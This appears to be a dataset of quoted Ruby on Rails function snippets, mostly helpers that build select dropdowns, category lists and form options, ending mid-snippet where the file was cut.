"def select_field_tag(name, current_value, choices, html_options = {})\r\n #MGS- force the name to be set to the name, no matter the html options\r\n html_options['name'] = name\r\n #MES- Set the ID to the name, if no ID was supplied\r\n if !html_options.has_key?('id')\r\n #MES- Replace '[' with '_' and ']' with '' because square brackets are not\r\n # allowed in IDs.\r\n html_options['id'] = name.sub(/[\\[]/, '_').sub(/\\]/, '')\r\n end\r\n\r\n options = ''\r\n choices.each do | item |\r\n options << option_tag(item[1], item[0], current_value.to_s == item[0].to_s)\r\n end\r\n #MGS- use this rails helper to build the select element\r\n content_tag(\"select\", options, html_options)\r\n end",
"def category_show_data\n category = Category.find(params[:category])\n\n @data = {\n name: category.full_name,\n vendors: vendors_data_from_category(category),\n protips: protips_from_category(category)\n }\n\n render json: @data\n end",
"def collect_tier_categories_for_select(klass, select=true)\n result = klass.find_all_categories.map {|c| [c.name, c.id]}\n result.insert(0, [\"Select...\".t, nil])\n result\n end",
"def set_shop_catagories\n @Catagories = Catagory.all \n end",
"def set_doctor_options(patient_ailment)\n @doctor_options = Hash.new\n specialty = ailment_specialty_pairs[patient_ailment]\n Doctor.where(specialty: specialty).map { |doctor| @doctor_options[doctor.name] = doctor.id }\n end",
"def filter_options(attr_class_option_ids)\n sql = %{\n SELECT DISTINCT CASE WHEN attributable_type=:product THEN\n attributable_id ELSE product_id END AS p_id\n FROM product_attributes pa\n JOIN attribute_options ao ON ao.id=pa.value_id\n LEFT JOIN product_search_products psp\n ON psp.search_product_id=attributable_id\n AND pa.attributable_type=:search_product\n WHERE attributable_type IN (:product, :search_product)\n AND value_type=:attribute_options\n AND ao.attribute_class_option_id IN (:attr_class_option_ids)\n }\n query = sanitize_sql_array [sql,\n {\n product: SitescanCommon::Product,\n search_product: SitescanCommon::SearchProduct,\n attribute_options: SitescanCommon::AttributeOption,\n attr_class_option_ids: attr_class_option_ids\n }]\n connection.select_values query\n end",
"def populate_category\n\t\t\t\tif params[:purpose] == \"category\"\n\t\t\t\t\t\tcategory = Category.find(params[:category_id])\n\t\t\t\t\t\t@sub_categories = category.sub_categories\n\t\t\t\telsif params[:purpose] == \"sub_category\"\n\t\t\t\t\t\tsub_category = SubCategory.find(params[:category_id])\n\t\t\t\t\t\t@inner_categories = sub_category.inner_categories\n\t\t\t\tend\n\t\tend",
"def select_custom_fields\n group_custom_fields 'select'\n end",
"def set_Category(value)\n set_input(\"Category\", value)\n end",
"def set_Category(value)\n set_input(\"Category\", value)\n end",
"def set_Category(value)\n set_input(\"Category\", value)\n end",
"def option_foreign_key_choices(object, foreign_key, foreign_key_choices_array)\n html = []\n foreign_key_choices_array.each do |choice|\n html <<\n \"<option value = #{choice.id} \n #{is_selected_html?(object, foreign_key, choice)}>\n #{choice.name}\n </option>\"\n end\n html.join\n end",
"def build_drop_down_for_klasses\n @drop_down_for_klasses = @klasses.inject([]) do |result,klass|\n result << [klass.name, admin_data_list_url(:klass => klass.name)]\n end\n end",
"def type_select object, method, label_text, options\n content_tag :div, :class => :\"type-select\" do\n attr_id = \"#{object.class.to_s.downcase}[#{method}]\".to_sym\n output = String.new\n output << content_tag(:label, label_text, :for => attr_id) unless label_text.blank?\n output << select_tag(attr_id, options)\n end\n end",
"def build_select(type, select_options_as_html)\n select_options = {\n id: input_id_from_type(type),\n name: input_name_from_type(type)\n }.merge!(@html_options)\n select_options[:disabled] = \"disabled\" if @options[:disabled]\n select_options[:class] = css_class_attribute(type, select_options[:class], @options[:with_css_classes]) if @options[:with_css_classes]\n\n select_html = +\"\\n\"\n select_html << content_tag(\"option\", \"\", value: \"\", label: \" \") + \"\\n\" if @options[:include_blank]\n select_html << prompt_option_tag(type, @options[:prompt]) + \"\\n\" if @options[:prompt]\n select_html << select_options_as_html\n\n (content_tag(\"select\", select_html.html_safe, select_options) + \"\\n\").html_safe\n end",
"def categorize_reports\n \t@reports = Report.all\n \t@reports.each do |report|\n \t\t# Get crime description\n \t\tdescription = report.description\n\n \t\t# Assign crime category based on description\n\t \tcase description\n\t\t\twhen \"118 - Theft - From Motor Vehicle - Petit\"\n\t\t\t\treport.update_attribute(:category, \"Theft From Motor Vehicle\")\n\t\t\twhen \"117 - Theft - From Motor Vehicle - Felony\"\n\t\t\t\treport.update_attribute(:category, \"Theft From Motor Vehicle\")\n\t\t\twhen \"450 - Robbery\"\n\t\t\t\treport.update_attribute(:category, \"Robbery\")\n\t\t\twhen \"254 - Assault\"\n\t\t\t\treport.update_attribute(:category, \"Assault\")\n\t\t\twhen \"262 - Felony Assault\"\n\t\t\t\treport.update_attribute(:category, \"Assault\")\n\t\t\twhen \"200 - Motor Vehicle Theft\"\n\t\t\t\treport.update_attribute(:category, \"Motor Vehicle Theft\")\n\t\t\twhen \"101 - Burglary - Zone 1\"\n\t\t\t\treport.update_attribute(:category, \"Burglary\")\n\t\t\twhen \"102 - Burglary - Zone 2\"\n\t\t\t\treport.update_attribute(:category, \"Burglary\")\n\t\t\twhen \"103 - Burglary - Zone 3\"\n\t\t\t\treport.update_attribute(:category, \"Burglary\")\n\t\t\twhen \"104 - Burglary - Zone 4\"\n\t\t\t\treport.update_attribute(:category, \"Burglary\")\n\t\t\twhen \"105 - Burglary - Zone 5\"\n\t\t\t\treport.update_attribute(:category, \"Burglary\")\n\t\t\twhen \"300 - Rape/Sexual Assault Vic 16 Yr and Older\"\n\t\t\t\treport.update_attribute(:category, \"Rape\")\n\t\t\twhen \"301 - Rape/Sexual Assault Vic 15 Yr and Younger\"\n\t\t\t\treport.update_attribute(:category, \"Rape\")\n\t\t\twhen \"250 - Homicide\"\n\t\t\t\treport.update_attribute(:category, \"Murder\")\n\t\tend\n\n\t\t# Get crime year\n\t\tyear = \"\"\n\t\tif report.date.length == 10\n\t\t\tyear = report.date[6..10]\n\t\tend\n\n\t\t# Update Year column from date\n\t\treport.update_attribute(:year, year)\n\tend\n\n\tredirect_to 'http://localhost:3000/admin'\n\n end",
"def add_choice_link(attribute)\n display = attribute.preset? ? \"\" : \"none\"\n link_to_function(t(\"custom_attributes.add_choice\"), \"addAttributeChoices(this)\", :class => \"add_choice_link right_link\", :style => \"display: #{ display }\")\n end",
"def selectize_items(selector = selectize_selector)\n all(\"#{selector} .selectize-dropdown-content .item\").map do |div|\n {\n value: div[:'data-value'],\n text: div.text,\n }\n end\n end",
"def add_html_options(existing_options)\n { readonly: @readonly, disabled: @disabled, autocomplete: @autocomplete }.merge(@data_options)\n .merge(existing_options)\n end",
"def prepare\n options[:category] = options[:value] if options[:value] && !options[:category]\n raise \"No categorizer set up for category tracker #{self.inspect}\" unless options[:category]\n \n @categorizer = create_lambda(options[:category]) unless options[:multiple]\n \n # Initialize the categories. Use the list of category names to \n @categories = {}\n options[:all_categories].each { |cat| @categories[cat] = 0 } if options[:all_categories].kind_of?(Enumerable)\n end",
"def data\n skill_categories.map do |category|\n edit_path = link_to(fa_icon('edit lg'), edit_skill_category_path(category))\n delete_path = link_to(fa_icon('trash-o lg'), category, method: :delete, data: { confirm: I18n.t('skill_categories.index.delete_confirm') })\n [\n link_to(category.name, skill_category_skills_path(category)),\n \"#{edit_path} #{delete_path}\"\n ]\n end\n end",
"def set_visual_info ()\n classes = ''\n\n ct = self.category_type\n ct && ct !~ /unknown/i &&\n classes << \" type_\" + ct.gsub( /[^a-zA-Z0-9\\-_]+/, '_' )\n\n classes << \" \" + to_css_class(self.category)\n\n self.css_classes = classes\n self.block_label = \"#{self.title}:<br/> #{self.subtitle}\"\n end",
"def set_selectbox_options\n set_kind_option\n set_scheduled_times_option\n set_user_option\n end",
"def initialize(category_options={})\n @id = category_options[\"id\"]\n @name = category_options[\"name\"]\n end",
"def amee_data_category\n @amee_data_category||=AMEE::Data::Category.get(connection, \"/data#{path}\")\n end",
"def parse_subdomain_categories\n dry_run_notification\n\n page_html = get_page_html SUBDOMAINS_LIST_URI\n\n ids = []\n\n if page_html\n page_html.css('#form_search_shop option').drop(1).each do |category|\n display_info \"#{category[:value]} --> #{category.content}\"\n\n ids << {id: category[:value], name: category.content}\n end\n end\n\n ids\n end",
"def load_edit_data\n super_load_data\n\n @grouped_option_values ||= @product.option_values.group_by(&:option_type)\n @grouped_option_values.sort_by { |option_type, option_values| option_type.position }\n end",
"def setup_hidden_option(good, good_id)\n return unless shop_options[:hidden][good_id]\n good.hidden_condition = shop_options[:hidden][good_id]\n end",
"def form_tr_select_cat_from_tree(form, obj, root, name, col, id, display_name, selected_obj, *args)\n options = args.extract_options!\n out = ''\n out += '<tr><td class=\"label\">'\n out += form.label col.to_sym, name\n out += ' : </td>'\n out += '<td class=\"field\">'\n out += select_cat_from_tree(obj, col, root, selected_obj, options)\n out += '</td></tr>'\n return out\n end",
"def amount_select\n tag = \"<select id=\\\"voucher_#{@voucher.id}_amount\\\">\"\n for i in (1..20)\n tag += \"<option value=\\\"#{i}\\\">#{i}</option>\"\n end\n tag += \"</select>\"\n end",
"def parse_option\n case params[:option]\n when \"id\", \"single_id\"\n # Render the id select field.\n \"shared/id_select\"\n when \"id_list\", \"id_array\"\n # Render the id multi select field.\n \"shared/id_multi_select\"\n when \"conditions_array\", \"conditions_hash\"\n # Render the conditions fields.\n @partial = \"shared/conditions\"\n when \"sub_method\", \"amount\", \"dynamic_find_by\", \"batches\", \"attributes\"\n # Render the corresponding option field(s).\n params[:option]\n end\n end",
"def select_field_user_security_att(user, group_id, choices, options = {})\r\n return select_field_tag(\"security_atts[#{group_id}]\", user.get_att_value(UserAttribute::ATT_SECURITY, group_id), choices, options.update({:id => \"security_atts_#{group_id}\"}))\r\n end",
"def options_html(type, is_person, super_entity, cid=\"00\", return_type=\"html\")\n sel_flag = true\n sel_str = \"\"\n\n poa_str = \" (Principal Entity) \"\n poa_str = \" (Principal Individual) \" if is_person == \"true\"\n\n array_result = []\n select_one_html = \"<option value=''>Select One...</option>\"\n result = \"\"\n\n if is_person == \"true\"\n groups = {}\n\n case type\n when \"stockholder\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 2, 3, 4]).order(type_: :asc)\n when \"principal\"\n person_true_entities = current_user.entities_list(super_entity).where(type_: [1, 2, 4]).order(type_: :asc)\n when \"agent\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 2]).where('id != ?', super_entity.principal.entity_id).order(type_: :asc)\n when \"settlor\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 2, 3, 4]).order(type_: :asc)\n when \"trustee\"\n if super_entity.beneficiaries.select(:entity_id).map(&:entity_id).blank?\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 3, 4]).order(type_: :asc)\n else\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 3, 4]).where('id not in (?)', super_entity.beneficiaries.select(:entity_id).map(&:entity_id)).order(type_: :asc)\n end\n when \"beneficiary\"\n if super_entity.trustees.select(:entity_id).map(&:entity_id).blank?\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 2, 3, 4]).order(type_: :asc)\n else\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 2, 3, 4]).where('id not in (?)', super_entity.trustees.select(:entity_id).map(&:entity_id)).order(type_: :asc)\n end\n when \"member\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 2, 3, 4]).order(type_: :asc)\n when \"manager\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 2, 3, 4]).order(type_: :asc)\n when \"general-partner\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 2, 3, 4]).order(type_: :asc)\n when \"limited-partner\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 2, 3, 4]).order(type_: :asc)\n when \"partner\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 3, 4]).order(type_: :asc)\n when \"limited-liability-partner\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 3, 4]).order(type_: :asc)\n when \"director\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 3]).order(type_: :asc)\n when \"officer\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 3]).order(type_: :asc)\n when \"tenant-in-common\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 2, 3, 4]).order(type_: :asc)\n when \"spouse\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 3, 4]).order(type_: :asc)\n when \"joint-tenant\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1, 2, 3, 4]).order(type_: :asc)\n when \"guardian\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1]).order(type_: :asc)\n when \"ward\"\n person_true_entities = current_user.entities_list(super_entity.id).where(type_: [1]).order(type_: :asc)\n else\n person_true_entities = []\n end\n\n person_true_entities.each do |entity|\n key = \"#{MemberType.member_types[entity.type_]}\"\n key = key + poa_str if !key.match(\"ttorney\").nil?\n if groups[key].nil?\n groups[key] = [entity]\n else\n groups[key] << entity\n end\n end\n\n case type\n when \"stockholder\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Corporate Stockholder', user_id: current_user.id)\n when \"principal\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Principal', user_id: current_user.id)\n when \"agent\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Agent', user_id: current_user.id)\n when \"settlor\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Settlor', user_id: current_user.id)\n when \"trustee\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Trustee', user_id: current_user.id)\n when \"beneficiary\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Beneficiary', user_id: current_user.id)\n when \"member\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'LLC Member', user_id: current_user.id)\n when \"manager\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'LLC Outside Manager', user_id: current_user.id)\n when \"general-partner\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'LP General Partner', user_id: current_user.id)\n when \"limited-partner\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'LP Limited Partner', user_id: current_user.id)\n when \"partner\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Partner', user_id: current_user.id)\n when \"limited-liability-partner\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Limited Liability Partner', user_id: current_user.id)\n when \"director\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Corporate Director', user_id: current_user.id)\n when \"officer\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Corporate Officer', user_id: current_user.id)\n when \"tenant-in-common\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Tenant in Common', user_id: current_user.id)\n when \"spouse\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Tenant by Entirety', user_id: current_user.id)\n when \"joint-tenant\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Joint Tenant', user_id: current_user.id)\n when \"judge\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Judge', user_id: current_user.id)\n when \"guardian\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Guardian', user_id: current_user.id)\n when \"ward\"\n person_true_contacts = Contact.all.where(is_company: false, contact_type: 'Client Participant', role: 'Ward', user_id: current_user.id)\n else\n person_true_contacts = []\n end\n\n groups.each do |k,v|\n result += \"<optgroup label='#{k}'>\"\n v.each do |entity|\n if (sel_flag && \"e#{entity.id}\" == cid) || (person_true_entities.count + person_true_contacts.count == 1)\n sel_flag = false\n sel_str = \" selected='selected' \"\n else\n sel_str = \"\"\n end\n result += \"<option value='e#{entity.id}' data-type='entity' #{sel_str}>#{entity.name} </option>\"\n array_result << [entity.id, entity.name]\n end\n result += \"</optgroup>\"\n end\n\n result += \"<optgroup label='Contacts'>\"\n\n person_true_contacts.each do |contact|\n if (sel_flag && \"c#{contact.id}\" == cid) || (person_true_entities.count + person_true_contacts.count == 1)\n sel_flag = false\n sel_str = \" selected='selected' \"\n else\n sel_str = \"\"\n end\n result += \"<option value='c#{contact.id}' data-type='contact' #{sel_str}>#{contact.name}</option>\"\n array_result << [contact.id, contact.name]\n end\n\n result += \"</optgroup>\"\n if return_type == 'html'\n if array_result.length > 1\n return (select_one_html + result).html_safe\n else\n return result.html_safe\n end\n else\n return array_result\n end\n\n else\n groups = {}\n\n case type\n when \"stockholder\"\n person_false_entities = current_user.entities_list(super_entity.id).where(type_: [6, 10, 11, 12, 13, 14]).order(type_: :asc)\n when \"principal\"\n person_false_entities = current_user.entities_list(super_entity).where(type_: [6, 10, 11, 12, 13, 14]).order(type_: :asc)\n when \"agent\"\n person_false_entities = current_user.entities_list(super_entity.id).where(type_: [10, 11, 12, 13, 14]).where('id != ?', super_entity.principal.entity_id).order(type_: :asc)\n when \"trustee\"\n person_false_entities = current_user.entities_list(super_entity.id).where(type_: [10, 11, 12, 13, 14]).order(type_: :asc)\n when \"beneficiary\"\n person_false_entities = current_user.entities_list(super_entity.id).where(type_: [6]).order(type_: :asc)\n when \"member\"\n person_false_entities = current_user.entities_list(super_entity.id).where(type_: [6, 10, 11, 12, 13, 14]).order(type_: :asc)\n when \"manager\"\n person_false_entities = current_user.entities_list(super_entity.id).where(type_: [10, 11, 12, 13, 14]).order(type_: :asc)\n when \"general-partner\"\n person_false_entities = current_user.entities_list(super_entity.id).where(type_: [10, 11, 12, 13, 14]).order(type_: :asc)\n when \"limited-partner\"\n person_false_entities = current_user.entities_list(super_entity.id).where(type_: [10, 11, 12, 13, 14]).order(type_: :asc)\n when \"tenant-in-common\"\n person_false_entities = current_user.entities_list(super_entity.id).where(type_: [6, 10, 11, 12, 13, 14]).order(type_: :asc)\n when \"guardian\"\n person_false_entities = current_user.entities_list(super_entity.id).where(type_: [14]).order(type_: :asc)\n else\n person_false_entities = []\n end\n\n person_false_entities.each do |entity|\n key = \"#{MemberType.member_types[entity.type_]}\"\n key = key + poa_str if !key.match(\"ttorney\").nil?\n if groups[key].nil?\n groups[key] = [entity]\n else\n groups[key] << entity\n end\n end\n\n case type\n when \"stockholder\"\n person_false_contacts = Contact.all.where(is_company: true, contact_type: 'Client Participant', role: 'Corporate Stockholder', user_id: current_user.id)\n when \"principal\"\n person_false_contacts = Contact.all.where(is_company: true, contact_type: 'Client Participant', role: 'Principal', user_id: current_user.id)\n when \"agent\"\n person_false_contacts = Contact.all.where(is_company: true, contact_type: 'Client Participant', role: 'Agent', user_id: current_user.id)\n when \"trustee\"\n person_false_contacts = Contact.all.where(is_company: true, contact_type: 'Client Participant', role: 'Trustee', user_id: current_user.id)\n when \"member\"\n person_false_contacts = Contact.all.where(is_company: true, contact_type: 'Client Participant', role: 'LLC Member', user_id: current_user.id)\n when \"manager\"\n person_false_contacts = Contact.all.where(is_company: true, contact_type: 'Client Participant', role: 'LLC Outside Manager', user_id: current_user.id)\n when \"general-partner\"\n person_false_contacts = Contact.all.where(is_company: true, contact_type: 'Client Participant', role: 'LP General Partner', user_id: current_user.id)\n when \"limited-partner\"\n person_false_contacts = Contact.all.where(is_company: true, contact_type: 'Client Participant', role: 'LP Limited Partner', user_id: current_user.id)\n when \"tenant-in-common\"\n person_false_contacts = Contact.all.where(is_company: true, contact_type: 'Client Participant', role: 'Tenant in Common', user_id: current_user.id)\n when \"judge\"\n person_false_contacts = Contact.all.where(is_company: true, contact_type: 'Client Participant', role: 'Judge', user_id: current_user.id)\n else\n person_false_contacts = []\n end\n\n groups.each do |k,v|\n result += \"<optgroup label='#{k}'>\"\n v.each do |entity|\n if (sel_flag && \"e#{entity.id}\" == cid) || (person_false_entities.count + person_false_contacts.count == 1)\n sel_flag = false\n sel_str = \" selected='selected' \"\n else\n sel_str = \"\"\n end\n result += \"<option value='e#{entity.id}' data-type='entity' #{sel_str}>#{entity.name} </option>\"\n array_result << [entity.id, entity.name]\n end\n result += \"</optgroup>\"\n end\n\n result += \"</optgroup><optgroup label='Contacts '>\"\n\n person_false_contacts.each do |contact|\n if (sel_flag && \"c#{contact.id}\" == cid) || (person_false_entities.count + person_false_contacts.count == 1)\n sel_flag = false\n sel_str = \" selected='selected' \"\n else\n sel_str = \"\"\n end\n result += \"<option value='c#{contact.id}' data-type='contact' #{sel_str}>#{contact.name}</option>\"\n array_result << [contact.id, contact.name]\n end\n\n result += \"</optgroup>\"\n if return_type == 'html'\n if array_result.length > 1\n return (select_one_html + result).html_safe\n else\n return result.html_safe\n end\n else\n return array_result\n end\n\n end\n end",
"def select_category_from_dropdown(category)\n click('Click to select category from dropdown', @driver.find_element(:xpath, DROPDOWN_OPTIONS_FORMAT % [category]))\n end",
"def categories_attributes=(category_attributes)\n category_attributes.values.each do |category_attribute|\n if !category_attribute[:name].empty?\n category = Category.find_or_create_by(category_attribute)\n self.categories << category\n end\n end \n \n end",
"def category_check_box_tags(field, options={})\n Preference.notification_options.map do |value|\n check_box_tag(\"preference[categories][#{field}][]\", value,\n @preference.categories[field] && @preference.categories[field].include?(value),\n options\n )\n end.join('</td><td class=\\'check-boxes\\'>').html_safe\n end",
"def get_listbox_data\n @countries = current_user.company.countries.dropdown_list\n @sectors = current_user.company.sectors.order(:sector)\n @rel_types = current_user.company.rel_types.dropdown_list\n @relationgroups = current_user.company.relations.dropdown_list\n end",
"def category_selection(category)\n category = Public_apis.find_by_name(category)\n #goes over list item array . find method to find item\n\n \n end",
"def populate_collection_select_fields\n create :state, state_name: 'California', code: 'CA'\n create :site_type, description: 'City', code: 'city', status: 'active', hide: 'no'\n end",
"def generate_attribute_input(attr_label)\r\n input_html = ''.html_safe\r\n\r\n # Get the attribute hash corresponding to the given attribute\r\n attr = @metadata.select{ |attr_hash| attr_hash[\"attribute\"].to_s.eql?(attr_label) }.first\r\n\r\n if attr[\"enforce\"].include?(\"integer\")\r\n number_field :submission, attr[\"attribute\"].to_s.to_sym, value: @submission.send(attr[\"attribute\"])\r\n\r\n elsif attr[\"enforce\"].include?(\"date_time\")\r\n if @submission.send(attr[\"attribute\"]).nil?\r\n date_value = nil\r\n else\r\n date_value = DateTime.parse(@submission.send(attr[\"attribute\"])).to_date.to_s\r\n end\r\n text_field(:submission, attr[\"attribute\"].to_s.to_sym, :class => \"datepicker\", value: \"#{date_value}\")\r\n\r\n elsif attr[\"enforce\"].include?(\"textarea\")\r\n text_area(:submission, attr[\"attribute\"].to_s.to_sym, rows: 3, value: @submission.send(attr[\"attribute\"]))\r\n\r\n # Create select dropdown when there are enforcedValues for the attr. But also let the user enter its own value if Other selected\r\n elsif !attr[\"enforcedValues\"].nil?\r\n metadata_values = @submission.send(attr[\"attribute\"])\r\n select_values = attr[\"enforcedValues\"].collect{ |k, v| [v,k]}\r\n # Add in the select ontologies that are not in the portal but are in the values\r\n if metadata_values.kind_of?(Array)\r\n metadata_values.map do |metadata|\r\n if !select_values.flatten.include?(metadata)\r\n select_values << metadata\r\n end\r\n end\r\n else\r\n if (!select_values.flatten.include?(metadata_values) && !metadata_values.to_s.empty?)\r\n select_values << metadata_values\r\n end\r\n end\r\n\r\n if attr[\"enforce\"].include?(\"list\")\r\n input_html << select_tag(\"submission[#{attr_label}][]\", options_for_select(select_values, metadata_values), :multiple => 'true',\r\n \"data-placeholder\".to_sym => \"Select ontologies\", :style => \"margin-bottom: 15px; width: 100%;\", :id => \"select_#{attr[\"attribute\"]}\", :class => \"selectOntology\")\r\n\r\n input_html << text_field_tag(\"add_#{attr[\"attribute\"].to_s}\", nil, :style => \"margin-left: 1em; margin-right: 1em;width: 16em;\", :placeholder => \"Or provide the value\",\r\n :onkeydown => \"if (event.keyCode == 13) { addOntoToSelect('#{attr[\"attribute\"]}'); return false;}\")\r\n\r\n input_html << button_tag(\"Add new value\", :id => \"btnAdd#{attr[\"attribute\"]}\", :style => \"margin-bottom: 2em;vertical-align: baseline;\",\r\n :type => \"button\", :class => \"btn btn-info btn-sm\", :onclick => \"addOntoToSelect('#{attr[\"attribute\"]}')\")\r\n\r\n else\r\n\r\n select_values << [\"None\", \"\"]\r\n select_values << [\"Other\", \"other\"]\r\n\r\n if metadata_values.nil?\r\n metadata_values = \"\"\r\n end\r\n\r\n input_html << select(\"submission\", attr[\"attribute\"], select_values, { :selected => metadata_values}, {:class => \"form-control\", :id => \"select_#{attr[\"attribute\"]}\", :style=> \"margin-bottom: 1em;\"})\r\n\r\n # Button and field to add new value (that are not in the select). Show when other is selected\r\n input_html << text_field_tag(\"add_#{attr[\"attribute\"].to_s}\", nil, :style => \"margin-left: 1em; margin-right: 1em;width: 16em;display: none;\", :placeholder => \"Or provide the value\",\r\n :onkeydown => \"if (event.keyCode == 13) { addValueToSelect('#{attr[\"attribute\"]}'); return false;}\")\r\n\r\n input_html << button_tag(\"Add new value\", :id => \"btnAdd#{attr[\"attribute\"]}\", :style => \"margin-bottom: 2em;display: none;vertical-align: baseline;\",\r\n :type => \"button\", :class => \"btn btn-info btn-sm\", :onclick => \"addValueToSelect('#{attr[\"attribute\"]}')\")\r\n\r\n # To show/hide textbox when other option is selected or not\r\n input_html << javascript_tag(\"$(function() {\r\n $('#select_#{attr[\"attribute\"]}').change(function() {\r\n if ($('#select_#{attr[\"attribute\"]}').val() == 'other') {\r\n $('#add_#{attr[\"attribute\"].to_s}').val(\"\");\r\n $('#btnAdd#{attr[\"attribute\"]}').show();\r\n $('#add_#{attr[\"attribute\"].to_s}').show();\r\n } else {\r\n $('#btnAdd#{attr[\"attribute\"]}').hide();\r\n $('#add_#{attr[\"attribute\"].to_s}').hide();\r\n }\r\n });\r\n })\")\r\n\r\n end\r\n\r\n\r\n return input_html\r\n\r\n\r\n elsif attr[\"enforce\"].include?(\"isOntology\")\r\n metadata_values = @submission.send(attr[\"attribute\"])\r\n select_values = @ontologies_for_select.dup\r\n # Add in the select ontologies that are not in the portal but are in the values\r\n if metadata_values.kind_of?(Array)\r\n metadata_values.map do |metadata|\r\n if !select_values.flatten.include?(metadata)\r\n select_values << metadata\r\n end\r\n end\r\n else\r\n\r\n if !select_values.flatten.include?(metadata_values)\r\n select_values << metadata_values\r\n end\r\n end\r\n\r\n if attr[\"enforce\"].include?(\"list\")\r\n input_html << select_tag(\"submission[#{attr_label}][]\", options_for_select(select_values, metadata_values), :multiple => 'true',\r\n \"data-placeholder\".to_sym => \"Select ontologies\", :style => \"margin-bottom: 15px; width: 100%;\", :id => \"select_#{attr[\"attribute\"]}\", :class => \"selectOntology\")\r\n\r\n else\r\n input_html << select_tag(\"submission[#{attr_label}]\", options_for_select(select_values, metadata_values), \"data-placeholder\".to_sym => \"Select ontology\",\r\n :style => \"margin-bottom: 15px; width: 100%;\", :id => \"select_#{attr[\"attribute\"]}\", :class => \"selectOntology\", :include_blank => true)\r\n end\r\n # Button and field to add new value (not in the select)\r\n input_html << tag(:br)\r\n\r\n input_html << text_field_tag(\"add_#{attr[\"attribute\"]}\", nil, :style => \"margin-left: 1em; margin-right: 1em;vertical-align: super;width: 16em;\",\r\n :placeholder => \"Ontology outside of the Portal\", :onkeydown => \"if (event.keyCode == 13) { addOntoToSelect('#{attr[\"attribute\"]}'); return false;}\")\r\n\r\n input_html << button_tag(\"Add new ontology\", :id => \"btnAdd#{attr[\"attribute\"]}\", :style => \"margin-bottom: 2em;margin-top: 1em;\",\r\n :type => \"button\", :class => \"btn btn-info btn-sm\", :onclick => \"addOntoToSelect('#{attr[\"attribute\"]}')\")\r\n\r\n return input_html\r\n\r\n elsif attr[\"enforce\"].include?(\"uri\")\r\n if @submission.send(attr[\"attribute\"]).nil?\r\n uri_value = \"\"\r\n else\r\n uri_value = @submission.send(attr[\"attribute\"])\r\n end\r\n\r\n if attr[\"enforce\"].include?(\"list\")\r\n input_html << button_tag(\"Add new value\", :id => \"add#{attr[\"attribute\"]}\", :style => \"margin-bottom: 0.5em;margin-top: 0.5em;margin-left: 0.5em;\",\r\n :type => \"button\", :class => \"btn btn-info btn-sm\", :onclick => \"addInput('#{attr[\"attribute\"]}', 'url')\")\r\n input_html << url_field_tag(\"submission[#{attr[\"attribute\"].to_s}][]\", uri_value[0], :id => attr[\"attribute\"].to_s, class: \"metadataInput\")\r\n # Add field if list of URI\r\n if !@submission.send(attr[\"attribute\"]).nil? && @submission.send(attr[\"attribute\"]).any?\r\n @submission.send(attr[\"attribute\"]).each_with_index do |metadata_val, index|\r\n if index != 0\r\n input_html << url_field_tag(\"submission[#{attr[\"attribute\"].to_s}][]\", metadata_val, :id => \"submission_#{attr[\"attribute\"].to_s}\", class: \"metadataInput\")\r\n end\r\n end\r\n end\r\n input_html << content_tag(:div, \"\", id: \"#{attr[\"attribute\"]}Div\")\r\n\r\n else\r\n # if single value\r\n input_html << text_field(:submission, attr[\"attribute\"].to_s.to_sym, value: uri_value, class: \"metadataInput\")\r\n end\r\n return input_html\r\n\r\n elsif attr[\"enforce\"].include?(\"boolean\")\r\n select(\"submission\", attr[\"attribute\"].to_s, [\"none\", \"true\", \"false\"], { :selected => @submission.send(attr[\"attribute\"])},\r\n {:class => \"form-control\", :style => \"margin-top: 0.5em; margin-bottom: 0.5em;\"})\r\n\r\n else\r\n # If input a simple text\r\n\r\n if attr[\"enforce\"].include?(\"list\")\r\n input_html << button_tag(\"Add new value\", :id => \"add#{attr[\"attribute\"]}\", :style => \"margin-bottom: 0.5em;margin-top: 0.5em;\",\r\n :type => \"button\", :class => \"btn btn-info btn-sm\", :onclick => \"addInput('#{attr[\"attribute\"]}', 